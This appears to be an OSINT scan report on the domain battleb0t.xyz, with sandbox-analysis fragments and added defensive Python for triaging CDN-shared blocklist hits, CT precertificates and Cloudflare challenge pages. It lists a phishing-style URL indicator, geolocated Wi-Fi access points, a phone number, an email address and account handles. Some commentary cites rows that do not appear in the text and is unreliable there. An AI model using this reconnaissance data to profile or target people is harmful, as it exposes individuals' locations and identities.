line terminators"- [targetUID: N/A]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00002908]\n "fontawesome-webfont_1_.eot" has type "Embedded OpenType (EOT) FontAwesome family"- [targetUID: N/A]\n "620BEF1064BD8E252C599957B3C91896" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\620BEF1064BD8E252C599957B3C91896]- [targetUID: 00000000-00002908]\n "RecoveryStore._E80B3267-2D93-11ED-AA59-08002740601A_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Tar87F.tmp" has type "data"- Location: [%TEMP%\\Tar87F.tmp]- [targetUID: 00000000-00002908]\n "ce5327c52694093aede79fbdda65cf4496210956_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "jquery-3.1.0.min_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'API Call', u'identifier': u'api-113', u'name': u'Touches files in program files directory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\iexplore.exe.config"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\VERSION.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IEFRAME.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IPHLPAPI.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet 
Explorer\\RPCRTREMOTE.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\ieproxy.dll"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\DWMAPI.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IEUI.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\MSHTML.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Microsoft Office\\Office14\\OUTLLIB.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Microsoft Office\\Office14\\OUTLLIB.DLL.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\sqmapi.dll"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\BCRYPT.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE.LOCAL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\APPHELP.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Microsoft Office\\Office14\\GROOVEEX.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Java\\jre1.8.0_151\\bin\\ssv.dll"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: www.trustsign.com.br\nConnection: Keep-Alive\nAccept-Language: en-US"- [Source: SSL_34.74.170.74]\n\n 
"de3\n[[~(.E]Kjk;5IZE0$%9vH<}X"u:2\nsw/.q0>?\n?iiG?>v%R`gG~:fxOJ?v>b8e\\GS3i4VgX\nZ^4Bq#Ch7O|yn;thhrry?)NI19:~35;57y"Xg<##Ox&hTqDA:i|y5[aX2II(n:0e\nC9<vHQ"m&\nB1ON}|RTL"C@S^\'J(f"eN2$\na!3YiAez|N-j2sETgX(Rx(1D:Y\'CECP}j4K6nV0@f Vig4Lw=g.;tiBfVf~hp@-A#?\'\nH+ic NsODso2={GK%(\'}--TgUdpwNuM>:OHY*ks\'-=^t~&\nzr9\n ]3LHDX$<>c]JBI\n7wE6g;C8)10:5_o#DiRC.G;*AP\n"X*%-hn3HmtmLG&@\'}l8{=a&\\1]d)(-as%\nLW\nR.M-kN$L*\ng>m/Rg!y3T#<IZ\\"\'F|>Z{V3G`HN4\n-f)j`,\n2p62X3T&#\\V3j3z9%s8=:^1/sXr=42\\7+%\n;qz%U+#W9gp!\\h7/*vsJ+IerH4!=`~\\s_&"GGl2b+Q+PI~<>akh8[,7}#JN+rDv}}MlLI,Q-Dz:<sU\'>Ghe9[8M4-p%m*:\nX*pkZBwg<r0G`<2ZI | 34.74.170.74 |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.238): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:10:06 | Malicious IP Address | Yes | VoIPBL OpenPBX IPs | 0 | 1 | 2 | 0 | None | VOIPBL Publicly Accessible PBX List [185.199.108.153]<br>http://www.voipbl.org/update | 185.199.108.153 |
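Both "risky" rows above point at shared infrastructure: 188.114.97.0/24 sits inside Cloudflare's published 188.114.96.0/20, and 185.199.108.153 is a GitHub Pages anycast address (the `github.io` co-hosting rows further down are the same tenant pool). A blocklist entry for a neighbour on an anycast range describes another tenant, not the target, so the finding should be downgraded rather than escalated. The Python below is an added example, not SpiderFoot code; the prefix list is a hand-typed subset of the ranges Cloudflare and GitHub publish and is an assumption to refresh from their current lists, and the sample rows are trimmed copies of rows on this page.

```python
"""Downgrade 'Malicious IP' / 'Blacklisted IP on Same Subnet' hits whose
address lies in a CDN or static-hosting anycast range.  Added example.
SHARED_PREFIXES is an assumed, hand-typed subset of the providers'
published ranges; refresh it before relying on it."""
import ipaddress

# Constructed subset (assumption): Cloudflare from www.cloudflare.com/ips,
# GitHub Pages from GitHub's documented 185.199.108.0/22 and
# 2606:50c0:8000..8003::153 addresses.
SHARED_PREFIXES = {
    "Cloudflare": [
        "188.114.96.0/20", "172.64.0.0/13", "104.16.0.0/13", "104.24.0.0/14",
        "162.158.0.0/15", "141.101.64.0/18", "108.162.192.0/18",
        "2606:4700::/32", "2a06:98c0::/29",
    ],
    "GitHub Pages": ["185.199.108.0/22", "2606:50c0:8000::/46"],
}

# Constructed: (Type, Data, Source Data) from rows on this page.
ROWS = [
    ("Blacklisted IP on Same Subnet",
     "Honeypotproject (188.114.97.238): Search Engine", "188.114.97.0/24"),
    ("Malicious IP Address",
     "VOIPBL Publicly Accessible PBX List [185.199.108.153]", "185.199.108.153"),
    ("Open TCP Port", "87.248.157.102:22", "87.248.157.102"),
]


def shared_provider(target: str):
    """Name of the provider whose range contains ``target`` (an IP or a
    CIDR), or None.  A bare IP is treated as a /32 or /128."""
    net = ipaddress.ip_network(target, strict=False)
    for provider, prefixes in SHARED_PREFIXES.items():
        for prefix in prefixes:
            pfx = ipaddress.ip_network(prefix)
            # subnet_of() refuses mixed address families, so guard on version.
            if pfx.version == net.version and net.subnet_of(pfx):
                return provider
    return None


def triage_rows(rows):
    """Attach a disposition to each (type, data, source) row.

    Shared-range hits are downgraded, not dropped: the target could still
    be the abusive tenant, but the list entry alone does not show that.
    """
    out = []
    for rtype, data, source in rows:
        provider = shared_provider(source)
        if provider is None:
            out.append((rtype, source, "keep"))
        else:
            out.append((rtype, source, f"downgrade: {provider} shared range"))
    return out


if __name__ == "__main__":
    for rtype, source, verdict in triage_rows(ROWS):
        print(f"{verdict:40} {rtype} ({source})")
```

The same check explains the other Cloudflare-addressed rows on this page (2606:4700:3030::ac43:a8fc, 2a06:98c1:3121::1, 172.67.135.9, 188.114.96.1): open ports, banners and certificates observed there belong to the edge, and the origin host is not visible through them.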
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:02:2D:51:66:85) | 37.7642, -122.3993 |
| 2023-05-12 02:44:42 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | panel.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:15:41:ea:93:cd:8d:62:0f:07:0f:be:37:47:74:c1:ad:1b
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 17:26:26 2022 GMT
Not After : Feb 15 17:26:25 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:aa:4d:69:12:67:d1:ef:14:86:20:9d:cf:2c:a8:
0d:c9:a7:6c:06:2b:6c:f8:9e:1f:f7:5b:41:e3:d6:
87:ca:57:bb:98:07:35:18:67:8f:28:74:6a:04:77:
89:a0:80:85:fc:4d:2e:7a:12:ee:d9:55:9b:e8:51:
03:88:3d:06:0a:14:47:b6:c6:bf:e2:f2:6e:38:57:
77:d8:da:10:9f:18:48:30:90:76:66:83:1b:18:b6:
6d:f9:38:58:a1:cc:7b:d2:96:34:23:9b:ea:85:2c:
bb:61:4a:ef:9a:58:1e:2d:73:fc:eb:20:c5:37:d4:
7c:8e:77:66:2d:b6:0a:4e:0d:e0:f4:1d:87:9f:f3:
39:d7:d9:45:03:a6:8f:40:08:8a:3e:d5:15:b6:01:
8a:08:27:45:ff:cb:af:e5:d1:fd:28:cb:df:75:d3:
f7:db:3d:e9:43:0c:e5:b6:28:89:d2:ba:63:6c:e0:
ac:03:c0:49:9f:2c:e6:11:96:03:1a:33:a3:63:63:
dc:3b:1c:a8:9b:0f:00:ea:cb:bf:0c:39:fd:1c:40:
ab:3a:92:ca:b0:90:5c:21:ed:f1:8e:4f:9e:e7:92:
92:53:94:1d:fa:e2:36:84:fa:2a:17:63:6d:d0:c9:
16:92:48:c8:82:19:57:63:48:56:6e:6a:2e:34:87:
cc:7c:79:cf:43:dc:a4:a2:fb:e4:06:17:02:db:ef:
92:10:48:04:d1:04:89:aa:65:ee:9d:e2:a1:cd:ce:
9c:27:f6:46:3e:9e:91:90:6e:12:78:d2:cd:5e:a3:
75:48:b4:82:f5:c9:29:da:c5:bb:ac:87:af:95:fa:
f8:49:db:fe:e5:df:04:7e:92:10:6e:c8:d7:7b:93:
ef:de:5b:4f:7a:70:41:0c:59:d9:04:5e:26:57:3d:
65:af:57:00:3d:40:e4:ec:3b:92:38:0a:d1:a5:20:
31:40:89:48:9a:58:46:06:1e:56:4f:e5:25:e6:f5:
33:d9:bb:68:90:99:70:c6:a1:93:5a:22:c1:e3:ee:
da:ef:45:a4:37:18:4c:33:42:7e:6f:07:01:85:ed:
36:f3:3f:be:f6:6a:d9:3e:fe:ad:4c:8d:18:3e:0e:
49:d9:7a:95:04:47:e8:2c:a9:fe:24:7a:53:d0:af:
27:b2:85:89:f7:05:df:d8:9a:0d:56:23:cd:ee:11:
cb:31:f6:4e:3f:af:22:51:d3:a0:8f:a4:52:72:6f:
12:6d:6d:c2:7a:fe:c4:93:c1:f6:23:a9:9a:2b:35:
9d:df:e3:e9:99:57:fb:f5:e8:d9:e8:4d:a5:ec:7e:
dd:22:c5:d3:4f:c7:2d:bf:e4:09:ee:6f:cb:b6:13:
f8:ae:73
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CE:03:E9:CB:9A:4D:5E:BB:32:45:93:FC:78:CC:A3:7F:08:26:B1:40
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
ac:60:96:91:2c:ed:62:e3:68:ab:ed:e4:c1:61:0e:e3:90:31:
8e:31:a9:4b:46:c3:8d:c5:e0:8d:6a:1f:71:38:56:82:9c:31:
ee:2d:1e:c2:98:27:b8:9a:55:a7:78:ac:42:82:80:5a:1a:3f:
46:90:d5:fc:3f:8e:74:b4:e7:d4:76:72:66:4f:64:e7:54:46:
71:43:bb:42:84:c6:ab:aa:25:38:1c:ad:60:ca:08:fb:2f:af:
6b:e9:0e:62:15:97:73:27:ee:39:ae:11:a2:19:fc:87:93:31:
01:c6:c2:bd:5e:38:b1:3d:e5:5a:62:7e:60:8c:17:d0:3e:6e:
32:57:eb:54:28:cc:4a:0d:97:2a:6c:f6:c3:5d:8d:fc:27:99:
db:56:f3:bf:e2:b4:48:94:fb:dc:8e:3d:27:43:4b:4a:90:a7:
5c:68:44:45:9f:de:e6:ec:0b:1d:70:e4:c8:83:60:12:96:7f:
ec:53:10:4f:3d:05:06:c8:b9:0f:d6:87:14:c3:ad:47:7e:54:
4f:22:a7:90:86:28:be:cb:1b:db:56:26:75:23:0a:0e:be:e0:
7a:ad:c8:af:3f:81:81:ab:65:ab:91:6f:ac:eb:f0:ed:29:05:
3a:74:6a:ac:41:f3:d3:ea:c7:b8:d2:98:d6:a4:8f:dc:f6:59:
7a:f9:d5:0f
|
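Two things in the certificate above matter before it is treated as evidence about panel.battleb0t.xyz: the `CT Precertificate Poison` extension marks it as a precertificate pulled from a Certificate Transparency log (a TLS client would reject it, so it proves a certificate was requested, not that this host served it), and its `Not After` of 15 Feb 2023 is well before the 12 May 2023 scan date. The Python below is an added example, not SpiderFoot's own code: it extracts the triage fields from an `openssl x509 -text` style dump (the sample is the row above with the modulus and signature bytes cut out, which the parser does not need) and reports those two caveats against the row's `Date Found` timestamp.

```python
"""Extract subject, SANs, validity and the CT poison flag from an
``openssl x509 -text`` dump and judge it against the scan time.
Added example; SAMPLE is an abridged copy of the certificate row above."""
import re
from datetime import datetime, timezone

# Constructed: the row above, minus the RSA modulus and signature hex.
SAMPLE = """\
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            04:15:41:ea:93:cd:8d:62:0f:07:0f:be:37:47:74:c1:ad:1b
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=US, O=Let's Encrypt, CN=R3
        Validity
            Not Before: Nov 17 17:26:26 2022 GMT
            Not After : Feb 15 17:26:25 2023 GMT
        Subject: CN=panel.battleb0t.xyz
        X509v3 extensions:
            X509v3 Basic Constraints: critical
                CA:FALSE
            X509v3 Subject Alternative Name:
                DNS:panel.battleb0t.xyz
            CT Precertificate Poison: critical
                NULL
"""

# The row's "Date Found" column.
SCAN_TIME = datetime(2023, 5, 12, 2, 44, 42, tzinfo=timezone.utc)


def _first(pattern: str, text: str):
    m = re.search(pattern, text)
    return m.group(1) if m else None


def _openssl_time(s: str) -> datetime:
    # openssl pads single-digit days ("Feb  5 ..."); collapse the whitespace.
    s = " ".join(s.split())
    return datetime.strptime(s, "%b %d %H:%M:%S %Y GMT").replace(tzinfo=timezone.utc)


def parse_x509_text(text: str) -> dict:
    """Fields a reviewer needs from the text dump; \\s* in the patterns
    lets a value sit on the line after its label, as openssl prints it."""
    san = _first(r"Subject Alternative Name:\s*(.+)", text) or ""
    sans = [p.strip()[4:] for p in san.split(",") if p.strip().startswith("DNS:")]
    return {
        "subject": _first(r"Subject:\s*(.+)", text),
        "serial": _first(r"Serial Number:\s*([0-9a-fA-F:]+)", text),
        "not_before": _openssl_time(_first(r"Not Before:\s*(.+)", text)),
        "not_after": _openssl_time(_first(r"Not After\s*:\s*(.+)", text)),
        "sans": sans,
        "precert_poison": "CT Precertificate Poison" in text,
        "is_ca": re.search(r"CA:TRUE", text) is not None,
    }


def triage(text: str, at: datetime) -> list:
    """Caveats to attach to the row before trusting the certificate."""
    c = parse_x509_text(text)
    notes = []
    if c["precert_poison"]:
        notes.append("precertificate from a CT log, not a certificate a TLS client would accept")
    if at > c["not_after"]:
        notes.append(f"expired {(at - c['not_after']).days} days before the scan")
    elif at < c["not_before"]:
        notes.append("not yet valid at scan time")
    return notes


if __name__ == "__main__":
    for note in triage(SAMPLE, SCAN_TIME):
        print("-", note)
```

A CT precertificate is still useful: it dates when the operator obtained a certificate for that name, which is often the best evidence available for when a panel host was set up; it just is not proof of what was live on the scan date.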
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5e66a4c91910fb-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.96.1 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ANY (Net ID: 00:04:E2:0E:BB:DF) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:45:49 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'Chicago', u'security': {u'is_vpn': False}, u'city_geoname_id': 4887398, u'region_geoname_id': 4896861, u'country': u'United States', u'region': u'Illinois', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'CLOUDFLARENET', u'isp_name': u'Cloudflare, Inc.', u'organization_name': u'Cloudflare, Inc.', u'autonomous_system_number': 13335}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'60666', u'longitude': -97.822, u'country_code': u'US', u'timezone': {u'abbreviation': u'CDT', u'gmt_offset': -5, u'is_dst': True, u'name': u'America/Chicago', u'current_time': u'21:45:48'}, u'latitude': 37.751, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'172.67.135.9', u'continent': u'North America', u'region_iso_code': u'IL'} | 172.67.135.9 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | palnet (Category: finance)<br>https://www.palnet.io/@login | login |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:07:40:61:40:4D) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:09:18 | Vulnerability - General | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | CVE-2018-14040<br>Score: Unknown<br>Description: Unknown | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js |
| 2023-05-12 03:03:19 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0-001-0.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ASE VISITORS (Net ID: 00:03:52:A1:3D:40) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:59:05) | 50.8897, 6.0563 |
| 2023-05-12 02:54:51 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 396982 | 34.74.170.74 |
| 2023-05-12 03:11:25 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Arizona, United States | +14806242505 |
| 2023-05-12 03:03:27 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00089.github.io |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:53:15 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 2606:50c0:8000::153 | battleb0t.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | GBC_Insaat (Net ID: 00:14:C1:0B:28:CC) | 40.2024, 29.0398 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | celikpalas (Net ID: 00:12:17:70:0F:C1) | 40.2024, 29.0398 |
| 2023-05-12 02:54:13 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 403 Forbidden<br>Date: <REDACTED><br>Content-Type: text/html; charset=UTF-8<br>Transfer-Encoding: chunked<br>Connection: close<br>X-Frame-Options: SAMEORIGIN<br>Referrer-Policy: same-origin<br>Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0<br>Expires: Thu, 01 Jan 1970 00:00:01 GMT<br>Vary: Accept-Encoding<br>Server: cloudflare<br>CF-RAY: 7c5016a1cc062a51-ORD<br>Content-Encoding: gzip | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:01:42 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.210): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} |
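The two "Non-Standard HTTP Header" rows and the 403 banner above all carry `server: cloudflare`, and the header rows also carry `cf-mitigated: challenge`: the scanner was answered by Cloudflare's interstitial challenge page, not by the application. Body hashes, header fingerprints and anything derived from that HTML describe the challenge page, so they must not be attributed to the target. The Python below is an added example, not SpiderFoot code; its two header sets are trimmed copies of rows on this page and the decision rules are the example's own (a plain Cloudflare 403 without `cf-mitigated` may be a WAF block, a challenge served without the header, or the origin's own 403 rewritten at the edge, so it is only labelled `edge-block`).

```python
"""Classify a recorded HTTP response as origin, proxied edge, edge block
or Cloudflare challenge, so fingerprints from it are used accordingly.
Added example; header sets are trimmed copies of rows on this page."""

# Constructed: the Cloudflare response from the 'Non-Standard HTTP
# Header' rows above (names lower-cased as SpiderFoot stored them).
CF_CHALLENGE = {
    "server": "cloudflare",
    "cf-mitigated": "challenge",
    "cf-ray": "7c5f8c5e7988238a-EWR",
    "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate",
    "content-type": "text/html; charset=UTF-8",
    "cross-origin-embedder-policy": "require-corp",
    "cross-origin-opener-policy": "same-origin",
}

# Constructed: the nginx 404 from the Censys row at the top of this section.
ORIGIN_404 = {
    "Server": "nginx/1.18.0 (Ubuntu)",
    "Content-Type": "text/html",
    "Connection": "keep-alive",
}


def _norm(headers: dict) -> dict:
    """Lower-case names and unify separators: the Censys row stores
    ``Content_Type`` while other modules store ``content-type``."""
    return {k.lower().replace("_", "-"): v for k, v in headers.items()}


def classify_response(headers: dict, status: int) -> str:
    """Return 'challenge', 'edge-block', 'edge' or 'origin'."""
    h = _norm(headers)
    if h.get("cf-mitigated") == "challenge":
        return "challenge"      # interstitial: nothing in it is the application
    if h.get("server") == "cloudflare":
        if status in (403, 503) and "cf-ray" in h:
            return "edge-block"  # WAF, headerless challenge, or origin 403 via the edge
        return "edge"            # proxied; Server describes Cloudflare, not the origin
    return "origin"


def fingerprint_is_usable(headers: dict, status: int) -> bool:
    """Only responses that passed through to the application may feed
    body-hash or library fingerprinting."""
    return classify_response(headers, status) in ("origin", "edge")


def origin_software(headers: dict, status: int):
    """Server header, but only when it is not the CDN's own banner."""
    if classify_response(headers, status) != "origin":
        return None
    return _norm(headers).get("server")


if __name__ == "__main__":
    print(classify_response(CF_CHALLENGE, 403), origin_software(CF_CHALLENGE, 403))
    print(classify_response(ORIGIN_404, 404), origin_software(ORIGIN_404, 404))
```

Applied to this page, the nginx/1.18.0 banner from 167.94.146.57's scan of port 80 is an origin answer and can be fingerprinted; the Cloudflare 403 rows are not, and a rescan that solves or bypasses the challenge (or reaches the origin directly) is needed before anything about the application behind battleb0t.xyz can be stated.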
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | ImageShack (Category: images)<br>https://imageshack.com/user/ayhu | ayhu |
| 2023-05-12 02:59:51 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | madler@alumni.caltech.edu | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://ocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a-ipfs-dweb-link.translate.goog/?_x_tr_hp=bafybeia3mp&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp#kantonsen%40encoded.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ad0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n 